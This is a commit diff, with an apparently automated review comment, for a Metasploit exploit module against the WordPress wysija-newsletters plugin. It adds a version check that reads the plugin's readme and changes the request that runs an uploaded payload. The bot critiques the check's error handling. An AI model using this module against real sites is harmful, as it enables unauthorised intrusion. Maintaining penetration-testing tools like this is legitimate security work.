added check method

bug/bundler_fix
Christian Mehlmauer 2014-07-02 11:07:58 +02:00
parent 54a28a103c
commit 40175d3526
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 27 additions and 1 deletions


@ -58,7 +58,33 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
res = send_request_cgi({
'uri' => readme_url,
'method' => 'GET'
})
# no readme present, so we can assume it's safe
if res.nil? || res.code != 200
return Msf::Exploit::CheckCode::Safe
end
# try to extract version from readme
# Example line:
# Stable tag: 2.6.6
version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
# readme present, but no version number
if version.nil?
return Msf::Exploit::CheckCode::Unknown
end
print_status("#{peer} - Found version #{version} of the plugin")
if Gem::Version.new(version) < Gem::Version.new('2.6.7')
return Msf::Exploit::CheckCode::Appears
else
return Msf::Exploit::CheckCode::Safe
end
end
def exploit
@ -92,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{peer} - Executing payload #{payload_uri}")
res = send_request_raw({
res = send_request_cgi({
'uri' => payload_uri,
'method' => 'GET'
})
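Review bot: In `check`, the captured `version` is passed straight to `Gem::Version.new`, which raises ArgumentError on a malformed string, and the capture `[^\r\n"\']+\.[^\r\n"\']+` accepts almost any text containing a dot, so a readme with an unusual stable tag would abort the check with an exception instead of producing a result. Guard the comparison with `return Msf::Exploit::CheckCode::Unknown unless Gem::Version.correct?(version)`, or narrow the capture to digits and dots. Separately, the first branch reports Safe when `res.nil?`, meaning no response arrived at all; a timeout says nothing about the plugin, so `return Msf::Exploit::CheckCode::Unknown if res.nil?` ahead of the status test would keep an unreachable host from being recorded as not vulnerable. A non-200 answer for readme.txt is also weaker evidence than the comment `# no readme present, so we can assume it's safe` suggests, since the file can be removed or blocked while the plugin stays installed, and the comment should say so.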